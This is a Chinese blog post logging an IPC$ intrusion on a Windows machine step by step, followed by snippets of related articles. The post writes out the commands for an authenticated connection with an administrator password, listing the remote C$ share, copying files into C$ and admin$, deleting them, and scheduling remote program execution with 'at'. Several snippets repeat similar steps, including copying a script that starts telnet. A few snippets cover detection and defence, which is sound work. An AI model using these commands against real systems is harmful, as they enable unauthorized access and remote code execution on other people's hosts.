IPC$入侵的流程

最新推荐文章于 2024-05-10 21:19:35 发布
原创 最新推荐文章于 2024-05-10 21:19:35 发布 · 1.1k 阅读 · 6 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#IPC

网上有很多的IPC$入侵记录,可以自行参考,这里只是一次的过程的记录而已,没有其他额外的内容。


1.建立非空连接

格式:net use \\IP <password> /u:"<Username>"

net use \\192.168.1.121 1qaz2wsx /u:"Administrator"


在域控下:net use \\IP pwd /u:domain\username

2.列一下目录 

dir \\192.168.1.121\c$
</pre><pre name="code" class="cpp">显示结果如下:
2015/07/29  12:01    <DIR>          3aaa
2015/06/01  23:23    <DIR>          cXXXX
2015/06/07  23:16    <DIR>          CloudMusic
2015/03/31  17:19    <DIR>          Exam
2009/07/14  11:20    <DIR>          PerfLogs
2015/05/16  10:23    <DIR>          Program Files
2015/07/29  13:06    <DIR>          Program Files (x86)
2015/03/21  15:09    <DIR>          Ramble
2015/03/21  18:43    <DIR>          Task
2015/07/28  11:49                58 testlog.txt
2015/08/09  09:46    <DIR>          Users
2015/08/06  15:38    <DIR>          Windows
2015/05/24  00:42    <DIR>          ADF
               1 个文件             58 字节
              12 个目录  7,865,815,040 可用字节



3.查看远程机器的时间

net time \\192.168.1.121


4.拷贝文件到远程机器

copy 123.txt \\192.168.1.121\C$


copy 123.txt \\192.168.1.121\admin$

//admin$所指路径为C:\Windows\system32


5.删除目标文件
del \\192.168.1.121\admin$\123.txt

6.执行某个程序(无交互)

at \\192.168.1.121 10:36 \\192.168.1.121\C$\mspaint.exe                         //即在后台运行,不会显示出来


内网渗透:利用IPC$实现横向控制OA系统
IiwEngine的博客
09-21 105
利用IPC$共享进行内网渗透攻击是一种常见的手法,攻击者可以通过该共享实现对目标主机的控制,进而横向渗透到OA系统等敏感资源。为了防止此类攻击,目标系统应采取相应的防御措施,并加强内网安全的监控和审计工作。攻击者可以利用IPC$共享来在目标主机上执行命令或进行文件传输,从而实现横向控制。强化访问控制:确保只有授权的用户可以访问IPC$共享,并采取适当的访问控制措施,如限制访问IP范围、使用强密码等。确定目标主机:选择目标主机作为攻击目标,并获取目标主机的IP地址。共享,可以阻止攻击者利用该共享进行攻击。
web入侵二之弱口令攻击及其他
jiangliuzheng的专栏
12-30 1万+
一、什么是弱口令   就是说由常用数字、字母、字符等组合成的,容易被别人通过简单及平常的思维方式就能猜到的密码,利用弱口令结合计算机系统等漏洞可以做到入侵的事半功倍的效果   二、共享入侵--IPC$     IPC$是共享“命名管道”资源,它是为了让进程间通信而开放的命令管道,可以通过验证用户名和密码获取相应的权限,在远程管理计算机和查看计算机的共享资源是使用,利用IPC$,攻击者甚至可
详细介绍IPC$攻击的流程
09-23
详细介绍IPC$攻击的流程,包括原理 命令 以及例子和注意事项
一份详尽的IPC$入侵资料
马马的专栏
12-29 707
[ccbirds入门级教程]--各个击破1--ipc$入侵 一 唠叨一下: 网上关于ipc$入侵的文章可谓多如牛毛,而且也不乏优秀之作,攻击步骤甚至可以说已经成为经典的模式,因此也没人愿意再把这已经成为定式的东西拿出来摆弄. 不过话虽这样说,但我个人认为这些文章讲解的并不详细,对于第一次接触ipc$的菜鸟来说,简单的罗列步骤并不能解答他们的许多迷惑(你随便找一个hack论坛搜一下ipc,看存在
ipc 入侵步骤
aod83029的博客
01-16 324
第一步:建立IPC隧道net use \\10.56.204.186\IPC$ "密码" /user:"用户" 第二步:映射对方c盘到本地z盘net use z: \\10.56.204.186\c$第三步:将sys.bat脚本复制到共享根目录下@net start telnet第四步:查看 10.56.204.186 当前时间net time \\10.56.204.186...
IPC$局域网入侵详解
帅帅的小窝
02-26 1万+
PC$命令详解  网上关于ipc$入侵的文章可谓多如牛毛,而且也不乏优秀之作,攻击步骤甚至可以说已经成为经典的模式,因此也没人愿意再把这已经成为定式的东西拿出来摆弄.不过话虽这样说,但我个人认为这些文章讲解的并不详细,对于第一次接触ipc$的菜鸟来说,简单的罗列步骤并不能解答他们的许多迷惑(你随便找一个hack论坛搜一下ipc,看存在的疑惑有多少).因此我写了这篇相当于解惑的教程.想把一些容易混淆
IPC$经典入侵步骤和常用net命令
河北正定欢迎您-少占鱼
10-23 4863
ipc$经典入侵步骤:1、net use [url=file://ip/ipc$]\\ip\ipc$[/url] 密码 /user:用户名2、copy 文件名 [url=file://ip/c$]\\ip\c$[/url]3、net  time [url=file://ip/]\\ip[/url]4、at [url=file://ip/]\\ip[/url] 时间 命令5、入侵成功,连接你的肉鸡常
计算机安全技术:IPC$入侵防范的教学单元设计
课题《IPC$入侵方法及防范》作为第五章第二节黑客攻击介绍的一部分,重点讲解了如何理解和应对Windows系统中的IPC$共享攻击。教师金小江通过精心设计的教学流程图,引导学生通过实例学习,掌握密码学原理、病毒防治...
IPC$主机入侵复现
最新发布
03-15
好的,我需要帮助用户了解如何通过IPC$进行主机入侵复现,主要用于安全测试或渗透测试的学习。首先,我得回顾一下用户提供的引用内容,确保信息准确。 根据引用[1],IPC$利用的条件是目标开启139或445端口,并且已...
操作系统IPC漏洞分析与防范:探讨IPC入侵及其防御措施
02-07
文中以具体的IPC漏洞攻击为例,详细介绍了攻击流程,包括漏洞扫描、获取权限以及上传木马等环节,并分析了造成入侵失败的原因。此外,提供了若干防范方法,例如禁止默认共享、限制空连接、关闭相关服务和过滤关键...
IPC$入侵的4种方式
weixin_43456810的博客
12-31 2150
IPC$入侵的4种方式 1. 建立空连接 net use \\192.168.1.111\IPC$ 只要在建立空连接的命令最后添加del,即删除IPC$空连接的命令 2. 查看远程主机的当前时间 net time \\192.168.1.111 3. 查看远程主机的共享资源 net view \\192.168.1.111 4. 得到远程主机的NetBIOS的用户名列表 nbtstat -a 192.168.1.111 禁止IPC$共享 services.msc–>Server–>启动
IPC$入侵完全指令
yutel的专栏
06-25 1万+
一   相关命令  1)建立空连接:  net use \\IP\ipc$ "" /user:""         (一定要注意:这一行命令中包含了3个空格)  2)建立非空连接:  net use \\IP\ipc$ "用户名" /user:"密码"      (同样有3个空格)  3)映射默认共享:  net use z: \\IP\c$ "密码" /user:"用户名"    
入侵检测——ipc
LainWith的博客
08-27 1549
目录什么是IPC复现抓包小写ipc特征大写IPC特征响应特征综合规则: 规则不是非常严谨,没有经过实战检验,检测方式仅供参考 什么是IPC IPC,又称ipc$,是windows系统中默认开启的一个共享空连接,用来让远程用户连接测试连接时的账号密码是否正确 在终端中输入net use \\目标IP\ipc$ 密码 /user:用户即可尝试连接目标 ipc$的利用条件: 管理员开启了默认共享 知道受害者的IP和登录密码 开启了139、445端口 常用命令: 工作组:net use \\目标IP\ipc
windows IPC$ 入侵
热门推荐
正在成为 code ape
01-26 2万+
IPC$简介 IPC$ (Internet Process Connection)国人叫他共享"命名管道"资源服务。 其实看原始英文名称我们能更好的理解他的用途和作用。 IPC$就是为“进程”间建立网络连接而存在的服务 说的再明确点就是:IPC$是一个为“各类进程”建立网络通信连接而存在的服务 ipc利用 1.windows server 2003 与 windows xp ipc连接无需密码即可...
ipc$入侵--- 全面整理
qionghaizi的专栏
04-30 930
什么是ipc$ IPC$(Internet Process Connection)是共享"命名管道"的资源(大家都是这么说的),它是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。 利用IPC$,连接者甚至可以与目标主机建立一个空的连接而无需用户名与密码(当然,对方机器必须开了ipc$共享,否则你是连接不上的),而利用这个空的
ipc$漏洞攻击(实验)
2301_76361674的博客
05-10 2964
我们总在说ipc$漏洞ipc$漏洞,其实,ipc$并不是真正意义上的漏洞,它是为了方便管理员的远程管理而开放的远程网络登陆功能,而且还打开了默认共享,即所有的逻辑盘(c$,d$,e$……利用IPC$,连接者甚至可以与目标主机建立一个空的连接而无需用户名与密码(当然,对方机器必须开了ipc$共享,否则你是连接不上的),而利用这个空的连接,连接者还可以得到目标主机上的用户列表(不过负责的管理员会禁止导出用户列表的)。5.然后,我们物理连接到靶机上,到了两分钟后,我们可以用命令看到,这个pp45的用户就出现了。
网络安全实验-攻击实验(1)-IPC 攻击
Microconquer的专栏
03-03 1876
一、常见的网络协议有哪些,工作在哪些端口?二、IPC是什么?它工作在哪个端口?三、网络攻击过程一般分哪几步流程四、IPC攻击的具体流程、使用的软件A.X-Scan的第一次使用B.多段IP地址攻击C.攻击指定IP地址(思考,如何通过IPC攻击一个QQ好友的计算机)五、实验思考与作业:A.计算机防御IPC攻击需要做哪些工作B.利用IPC攻击测试性
【内网横向】IPC$入侵
网络安全从业者的学习笔记
06-26 696
IPC(Internet Process Connection)共享“命名管道”的资源,内网横向时常常用得到。IPC$利用的条件1、目标开启139、445端口。2、已有目标凭证(密码、hash等)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值